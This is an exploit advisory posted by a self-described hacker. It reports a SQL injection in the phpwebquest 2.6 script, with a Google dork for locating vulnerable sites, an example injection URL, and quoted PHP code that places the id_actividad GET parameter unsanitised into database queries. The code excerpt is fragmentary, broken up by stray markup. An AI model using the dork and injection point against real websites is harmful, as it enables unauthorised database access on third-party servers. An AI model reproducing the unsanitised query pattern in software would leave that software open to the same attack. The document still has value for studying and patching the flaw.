PHP Webquest

# Exploit Title: sql injection # Google Dork: inurl:webquest/soporte_horizontal_w.php?id_actividad= # Date: [24/01/2015] # Exploit Author: [jord4nroo7] anonjo@aol.com # Vendor Homepage: [http://phpwebquest.org] # Software Link: [http://phpwebquest.org/?page_id=14] # Version: [phpwebquest-2.6] # Tested on: [windows 8.1] #Exploit: sql inhection found on phpwebquest script version 2.6 # #example http://localhost/phpwq/webquest/soporte_horizontal_w.php?id_actividad=184&id_pagina=1%27' #--------------------------- if ($_GET['id_actividad']!=''){ $id_actividad=$_GET['id_actividad'];--------->sqlinjection here }else{ $id_actividad='1500000'; } if ($_GET['id_pagina']!=''){ $id_pagina=$_GET['id_pagina']; }else{ $id_pagina='1'; $texto_actual=$texto_alternativo; $imagen_actual='../imagenes/no_imagen.gif'; } #---------------------------- "; #echo "PAGINA DEL GET:".$id_pagina."
"; $sentencia= "SELECT * FROM actividad WHERE id_actividad=".$id_actividad; $resultado=mysql_query($sentencia); while($v=mysql_fetch_array($resultado)){ foreach ($v as $indice=>$valor){ if(!is_int($indice)){ # echo $indice.":".$valor."
"; $campo[$indice]=$valor; } } } $sentencia="select * from pagina where id_actividad=".$id_actividad." order by num_pagina asc"; $resultado=mysql_query($sentencia); $j=1; while($v=mysql_fetch_array($resultado)){ foreach ($v as $indice=>$valor){ if(!is_int($indice)){ #echo $indice.":".$valor."
"; $campo[$j][$indice]=$valor; } } $j++; } for ($cont=1; $cont<=5; $cont++){ if ($campo[$cont]['num_pagina']==$id_pagina){ $texto_actual=$campo[$cont]['texto']; $imagen_actual=$campo[$cont]['imagen']; } } $resta=0; $tamano_enlaces=$campo['font_size'] - $resta ; $tamano_titulo=$campo['font_size']; #echo $tamano_titulo; ?> PHP Webquest

'; $sentencia="select url, descripcion from url where id_actividad=".$id_actividad; $resultado=mysql_query($sentencia); $j=1; while($v=mysql_fetch_array($resultado)){ foreach ($v as $indice=>$valor){ if(!is_int($indice)){ if($indice=='url'){ echo '"; } $url[$j][$indice]=$valor; } } $j++; } } mysql_close($c); ?>

'; }else{ echo $valor."

PHPWebquest

#greetz to all my friends ,balawi,ro3ob hr ,mothana-X , sharingan jo , and anonymous jo , and all muslim hackers